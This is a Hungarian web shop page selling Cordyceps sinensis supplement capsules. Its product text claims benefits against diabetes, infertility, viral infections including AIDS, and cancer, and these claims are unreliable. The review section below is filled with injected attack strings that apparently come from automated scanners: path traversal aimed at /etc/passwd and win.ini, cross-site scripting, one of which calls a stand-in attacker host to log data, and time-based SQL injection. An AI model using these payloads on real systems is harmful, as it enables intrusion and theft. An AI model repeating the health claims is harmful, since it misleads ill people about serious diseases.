kép

Cordyceps sinensis


Ár: 6 490 Ft

Share

A Cordyceps sinensis a hernyók alakjára emlékeztető gomba, a neve is innen származik. A Cordyceps sinensis erősíti az immunrendszert és vitalizál, ugyanis a sejtekben lévő mitokondriumokban – ahol az energiatermelés zajlik – növeli az energiaszintet. Kutatási eredmények bizonyítják, hogy a gombakivonat hatóanyaga pozitív hatással van az asztma és más légzőszervi megbetegedések kezelésében, valamint a diabétesz kiegészítő terápiájában, de segít erectilis disfunkció (merevedési zavar) esetén is. Szintén Japánban kutatják a gomba máj- és vesevédő szerepét.


A gomba növeli a szervezet teljesítőképességét. Jótékony hatása van a magas vérnyomásra, a magas vérzsírszintre, valamint stresszes állapotra. 

Krónikusan legyengült, kimerült személyeknél is bizonyítottan hatásos. A Cordyseps sinensis erősíti a fitoösztrogének hatását. Továbbá javítja a szervezet oxigén felhasználását, erősíti az immunrendszert, karban tartja a szívet és az érrendszert, valamint jó antioxidáns hatású, így hatékonyan veszi fel a harcot a szervezetben keletkező káros szabad gyökökkel.

Alkalmazási területek:

energiaszint fokozó (serkenti az immunrendszert)
asztma
diabétesz (cukorbetegség)
meddőség
erectilis disfunkció (merevedési zavar)
alacsony libidó ellen
anti-aging (öregedés ellen)
májvédő funkció
vesevédő funkció
légzőszervi megbetegedésekre (javítja a légzésfunkciókat)
baktérium és vírusölő hatású
vérhígító hatású 


Ellenjavallt:

A tudomány jelenlegi állásfoglalása szerint a Cordyceps gomba vérhígító hatású.
Vérhígító hatása miatt azoknak nem ajánlott, akik vérhígító készítményeket szednek.

Figyelmeztetés:
Hormonfüggő tumoroknál (prosztata, mell) a gombakivonat megemeli az ösztrogén és a tesztoszteron szintet. C. sinensis hipoglikémiás (vércukorszint csökkentő) tulajdonságai miatt ajánlott a gyakori vércukorszint ellenőrzés az inzulinos betegeknél. Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Származási hely: Anglia


Cordyceps sinensis Kínai hernyógomba; „Himalája Viagrája” (klinikai útmutató: Martin Powell)

japán neve - Tochukas
kínai neve- Dong Chong Xia Cao/”nyáron növény télen féreg”
angol neve - Caterpillar fungus/ hernyó gomba

A több mint 700 fajta Cordyceps gombák közül ez az egyetlen gyógyhatású egyed, amely ősidők óta Ázsia legértékesebb kincsei közé sorolnak, hisz köztudott szexuális érdeklődést fokozó, változókori panaszokat csökkentő és fizikai teljesítőképességet növelő hatása. 

A C.sinensis Tibet 3000 m feletti fennsíkjain honos élősködő gomba. Spórái egy bizonyos földalatti rovarlárvában telepszenek meg, azzal szimbiózisban élve, tápanyagát hasznosítva növekszik, majd a kifejlett gombatest bizarr lárvaalakja előbukkan a föld felszínére. Bár a hagyományosan betakarított Cordyceps sinensis még mindig elérhető, a gyógygomba túlnyomó többségét már gabonatáptalajon (szubsztrátokon) termesztik, így biztosítható a jobb minőségű és megfelelő mennyiségű gomba, amelyet már kifizethető áron tudnak értékesíteni. 

A Cordyceps fajokra jellemző poliszacharidok és lipidek mellett számos nukleozid analóg is megtalálható. Mégpedig a cordycepin és a 3-deoxyadenosine-nak köszönhető, hogy C.sinesis oxigén hiányában is képes befolyásolni számos biokémiai folyamatot, mint például az RNS/DNS szintézisét. A Cordyceps RNS képződést megszakító képességének vizsgálata vezetette a gyógyszergyárakat a nukleozid analógok, úgynevezett reverz transzkriptáz inhibitorok kifejlesztésére, amelyek igen hatékony megoldásnak bizonyulnak még napjainkban is a súlyos vírusos (pl. AIDS) betegségek és a rák leküzdésében is. Ezek a nukleozidok ugyanis kompetitív versengésbe kezdenek a vírussal a fertőzött sejtekben, majd megnyerve a versenyt bekötődnek és megzavarják a fertőzött sejt osztódását, így megakadályozzák a kóros sejtek szaporodását és terjedését. 
A Cordyceps adenozin és az adenozin-monofoszfát tartalma miatt pedig fontos szerepet játszik a sejtek energiatermelő folyamataiban, a kimerültség csökkentésében, a fizikai aktivitás fokozására.

Anti-aging és anti-stressz 
C. sinensis (Cordyceps Cs-4 törzs) hagyományos étrend kiegészítőként használható az időseknél és a krónikus betegek rehabilitációjánál, hisz különösen jótékonyan hat az egészséges idős populáció oxigénfelvételére, az aerob kapacitásukra, és fokozza az ellenállásukat a fáradtsággal szemben. Több kísérletben nyert megerősítést az a megfigyelés, hogy a Cordyceps kiegyensúlyozza a lelki állapotot, csökkenti a stressz indukálta feszültséget, és depresszió esetén is hatásosnak bizonyult. Időseknél javította a koncentráció, a tanulási és az emlékezési képességét is. Így jogosan tekinthető a Cordyceps sinensis anti-stressz és anti-aging (öregedés ellenes) gombának is. 
Vizsgálati bizonyítékok alapján a C. sinensis poliszacharid kivonata is képes javítani az agyműködést, valamint az antioxidáns enzimeivel (szuperoxid dizmutáz, glutation peroxidáz és kataláz) részt vesz a szabad gyökök okozta káros oxidatív, így az öregedési folyamatok gátlásában és pozitív hatást fejt ki a szív-és érrendszeri funkciókra.  
A C. sinensis az 1990-es évek elején került a kínai sportolók fókuszába, mivel rendszeres fogyasztásuk látványosan megnövelte sport-teljesítményüket. A távolsági futók 71%-nál észlelt jelentős javulásról számolt be egy 1996-os tanulmány, amelyben a résztvevők a C. sinensis és egy közeli rokon fajának, a C. militaris kivonatát használták. A C. sinensis adagolással végzett tanulmányok az ülő embereknél is jelentős növekedést mutattak az energia-termelés és oxigén kapacitás tekintetében.

Férfi- és női hormonok, libidó
Állatokon végzett kísérletek bebizonyították, hogy a C. sinensis és rokon fajok biomasszája egyértelműen fokozta a férfi nemi hormonok termelődését, a spermiumok mennyiségét és azok mozgékonyságát is.  Míg Ázsiában a merevedési zavarok megoldásaként vált igazán népszerűvé a Cordyceps sinensis. Talán e régi kínai andekdótákból ismerthatása miatt születhetett egy újabb elnevezése a C.sinensis gombának, mint a „Himalája Viagrája”. 
A C.sinensist egyre gyakrabban használják meddőségi klinikákon, mivel számos bizonyíték igazolta az ösztrogén termelődés fokozó hatását, amely előnyös hatással van a női termékenységre. Ezt a pozitív ösztrogénhatást használják ki a változó kor utáni gyors csontritkulás megakadályozásánál is. 

Cukorbetegség
•    beindítja az inzulin felszabadulását
•    növeli a máj glukóz lebontását
•    fokozza a sejtek inzulinérzékenységét
Az egyik randomizált vizsgálatból kiderült, hogy a páciensek 95% -át kezelték C.sinensis (3g/nap) biomasszájával, miután 54%-uknál javult a vércukorszint. Az emelt dózisban (4.5g/nap) adagolt C.sinensis biomassza az alkohol miatt kialakult 2-es típusú cukorbetegeknél nem csak a vércukorszintet rendezte, hanem csökkentette az alkohol utáni vágyat is.

Májvédelem
Állatkísérletek bizonyítják, hogy a C.sinensis megfékezi a máj fibrotikus elfajulását és segít helyreállítani a normál májfunkciókat.  Egy klinikai vizsgálat során megfigyelték, hogy az alkoholos-zsírmáj esetében a páciensek májenzim értékei 63-70%-val javultak 90 nap C.sinensis 3g/nap biomassza adagolása során.

Vesevédelem
A C.sinensis-ről köztudottan elfogadott vesetámogató hatása a krónikus veseelégtelenség és a gentamycin antibiotikum mellékhatásaként jelentkező vesekárosodás esetében is.

Léguti betegségek 
A Kínai hernyógomba tradicionálisan használatos asztmás esetekben és a krónikus tüdőbetegségekben (COPD2) is. 

Anti-virális/Vírusellenes
Mint azt már korábban taglaltuk, a cordyceps fajokban lévő nukleozid analógok képesek meggátolni a vírusszaporodást. Ezzel párhuzamosan a poliszacharid tartalmuknak köszönhetően fokozzák az immunválaszt a virális fertőzésekben. A cordyceps fajok által kiváltott fokozott immunválasz és a vírus szaporodásának gátlása révén a leghatékonyabb gombafajnak bizonyulnak a krónikus vírusfertőzésekben.

Rákos megbetegedések
Ígéretes hatással rendelkezik a rák elleni küzdelemben is a C.sinensis, hisz egyik legjelentősebb hatóanyaga, a nukleozid módosulata, a cordycepin fokozza a ráksejtek pusztulását és támogatja a szervezet védekező képességét a rák ellen. 

KLINIKAI ÖSSZESÍTŐ

Terápiás jelentősége:
Fogamzó képesség és szexuális funkciók serkentése, energiaháztartás szabályozása, tüdő-, vese-, májfunkciók támogatása.

Fő hatóanyagai:
-    nukleozid analógok (pl. cordycepin; 3-deoxyadenosine)
-    poliszacharidok
-    adenozin és az adenozin-monofoszfát
Condryceps fajok egyedülálló tulajdonságai elsősorban a nukleozid-származékainak köszönhető, amely számos rákos megbetegedés esetén bizonyult hasznosnak.

Figyelmeztetés!
Hormonfüggő tumoroknál (prosztata, mell) a gombakivonat megemeli az ösztrogén és a tesztoszteron szintet. C. sinensis hipoglikémiás (vércukorszint csökkentő) tulajdonságai miatt ajánlott a gyakori vércukorszint ellenőrzés az inzulinos betegeknél.

A Cordyceps sinensis (kínai hernyógomba) hozzájárul a szervezet energiaszintjének növeléséhez és az immunrendszer erősítéséhez.

Összetevők: Cordyceps sinensis, kínai hernyógomba, gombaszövedék-biotömeg formában, hidroxi-proril-metil-cellulóz

OÉTI:9807/2011

Kiszerelés: 60db kapszula/doboz

 

Összetevők:
Cordyceps sinensis, kínai hernyógomba, gombaszövedék-biotömeg formában, hidroxi-proril-metil-cellulóz

Hatóanyag 6 db kapszulára vonatkoztatva: 

3300 mg Cordyceps sinensis, kínai hernyógomba, gombaszövedék-biotömeg formában

Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Csomagolási egység: A műanyag tégely 60db kapszulát tartalmaz

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Származási hely: Anglia

suykewut 2020-08-15 19:32:44
Értékelés:
WEB-INF\web.xml
suykewut 2020-08-15 19:32:40
Értékelés:
WEB-INF/web.xml
suykewut 2020-08-15 19:32:38
Értékelés:
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
suykewut 2020-08-15 19:32:28
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
qbljnqnm 2020-08-15 19:32:25
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img sRc='http://attacker-9463/log.php?
suykewut 2020-08-15 19:32:21
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
suykewut 2020-08-15 19:32:15
Értékelés:
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
qbljnqnm 2020-08-15 19:32:11
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<mKJtg5 x=9824>
suykewut 2020-08-15 19:32:09
Értékelés:
..\..\..\..\..\..\..\..\windows\win.ini
suykewut 2020-08-15 19:32:00
Értékelés:
................windowswin.ini
suykewut 2020-08-15 19:31:56
Értékelés:
qbljnqnm 2020-08-15 19:31:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ifRAme sRc=9358.com></IfRamE>
suykewut 2020-08-15 19:31:49
Értékelés:
qbljnqnm 2020-08-15 19:31:44
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WRVR1X>BNWHS[!+!]</WRVR1X>
qbljnqnm 2020-08-15 19:31:40
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WRVR1X>BNWHS[!+!]</WRVR1X>
suykewut 2020-08-15 19:31:12
Értékelés:
../../../../../../../../../../windows/win.ini.jpg
qbljnqnm 2020-08-15 19:31:00
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WRVR1X>BNWHS[!+!]</WRVR1X>
suykewut 2020-08-15 19:30:53
Értékelés:
C:\WINDOWS\system32\drivers\etc\hosts
suykewut 2020-08-15 19:30:45
Értékelés:
../../../../../../../../../../windows/win.ini
suykewut 2020-08-15 19:30:38
Értékelés:
WEB-INF\web.xml
suykewut 2020-08-15 19:30:22
Értékelés:
/WEB-INF/web.xml
qbljnqnm 2020-08-15 19:30:15
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!1xewk <ScRiPt >9Io1(9013)</ScRiPt>
suykewut 2020-08-15 19:30:13
Értékelés:
WEB-INF/web.xml
suykewut 2020-08-15 19:29:59
Értékelés:
/\../\../\../\../\../\../\../etc/passwd
qbljnqnm 2020-08-15 19:29:56
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<% contenteditable onresize=9Io1(9078)>
suykewut 2020-08-15 19:29:56
Értékelés:
file:///etc/passwd
suykewut 2020-08-15 19:29:52
Értékelés:
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
qbljnqnm 2020-08-15 19:29:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!}body{acu:Expre/**/SSion(9Io1(9273))}
suykewut 2020-08-15 19:29:49
Értékelés:
..
suykewut 2020-08-15 19:29:46
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
suykewut 2020-08-15 19:29:44
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
suykewut 2020-08-15 19:29:42
Értékelés:
/.././.././.././.././.././.././.././../etc/./passwd%00
suykewut 2020-08-15 19:29:39
Értékelés:
%2fetc%2fpasswd
qbljnqnm 2020-08-15 19:29:38
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img<!-- --> src=x onerror=alert(9677);//><!-- -->
suykewut 2020-08-15 19:29:37
Értékelés:
/etc/passwd
suykewut 2020-08-15 19:29:35
Értékelés:
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
suykewut 2020-08-15 19:29:32
Értékelés:
/../..//../..//../..//../..//../..//etc/passwd.jpg
qbljnqnm 2020-08-15 19:29:29
Értékelés:
[url=http://www.vulnweb.com][/url]
suykewut 2020-08-15 19:29:22
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
qbljnqnm 2020-08-15 19:29:16
Értékelés:
<a HrEF=jaVaScRiPT:>
suykewut 2020-08-15 19:29:04
Értékelés:
../../../../../../../../../../etc/passwd.jpg
qbljnqnm 2020-08-15 19:29:00
Értékelés:
<a HrEF=http://www.vulnweb.com></a>
suykewut 2020-08-15 19:28:59
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
suykewut 2020-08-15 19:28:57
Értékelés:
../../../../../../../../../../../../../../../proc/version
qbljnqnm 2020-08-15 19:28:49
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<input autofocus onfocus=9Io1(9905)>
suykewut 2020-08-15 19:28:48
Értékelés:
../../../../../../../../../../etc/passwd
qbljnqnm 2020-08-15 19:28:42
Értékelés:
qbljnqnm 2020-08-15 19:28:31
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!&lt;ScRiPt&gt;9Io1(9715)&lt;/sCripT&gt;
qbljnqnm 2020-08-15 19:28:22
Értékelés:
Írj véleményt a termékről!\u003CScRiPt\9Io1(9789)\u003C/sCripT\u003E
qbljnqnm 2020-08-15 19:28:14
Értékelés:
%25%63%33%25%38%64%72%6A%25%32%30%76%25%63%33%25%61%39%6C%65%6D%25%63%33%25%61%39%6E%79%74%25%32%30%61%25%32%30%74%65%72%6D%25%63%33%25%61%39%6B%72%25%63%35%25%39%31%6C%21%3C%53%63%52%69%50%74%20%3E%39%49%6F%31%289699%29%3C%2F%73%43%72%69%70%54%3E
qbljnqnm 2020-08-15 19:28:07
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img/src=">" onerror=alert(9922)>
qbljnqnm 2020-08-15 19:28:00
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=xyz OnErRor=9Io1(9089)>
qbljnqnm 2020-08-15 19:27:53
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=//testasp.vulnweb.com/t/dot.gif onload=9Io1(9342)>
qbljnqnm 2020-08-15 19:27:45
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<body onload=9Io1(9650)>
qbljnqnm 2020-08-15 19:27:35
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9336'>
qbljnqnm 2020-08-15 19:27:29
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<isindex type=image src=1 onerror=9Io1(9647)>
qbljnqnm 2020-08-15 19:27:25
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<svg
qbljnqnm 2020-08-15 19:27:21
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<video><source onerror="javascript:9Io1(9886)">
qbljnqnm 2020-08-15 19:27:16
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >9Io1(9222)</ScRiPt>
dinwkegs 2020-08-15 19:27:06
Értékelés:
61'
dinwkegs 2020-08-15 19:27:01
Értékelés:
ypO1pfHV'));select pg_sleep(10.956); --
qbljnqnm 2020-08-15 19:26:59
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9335></ScRiPt>
dinwkegs 2020-08-15 19:26:58
Értékelés:
5dQP1JJn');select pg_sleep(10.956); --
dinwkegs 2020-08-15 19:26:57
Értékelés:
fgyDyJiu';select pg_sleep(10.956); --
dinwkegs 2020-08-15 19:26:53
Értékelés:
cH66TGG3'; waitfor delay '0:0:10.956' --
dinwkegs 2020-08-15 19:26:51
Értékelés:
1 waitfor delay '0:0:7.304' --
qbljnqnm 2020-08-15 19:26:51
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >9Io1(9060)</ScRiPt>
dinwkegs 2020-08-15 19:26:48
Értékelés:
(select(0)from(select(sleep(7.304)))v)/*'+(select(0)from(select(sleep(7.304)))v)+'"+(select(0)from(select(sleep(7.304)))v)+"*/
qbljnqnm 2020-08-15 19:26:47
Értékelés:
Írj véleményt a termékről!<ScR<ScRiPt>IpT>9Io1(9818)</sCr<ScRiPt>IpT>
dinwkegs 2020-08-15 19:26:46
Értékelés:
if(now()=sysdate(),sleep(7.304),0)/*'XOR(if(now()=sysdate(),sleep(7.304),0))OR'"XOR(if(now()=sysdate(),sleep(7.304),0))OR"*/
dinwkegs 2020-08-15 19:26:44
Értékelés:
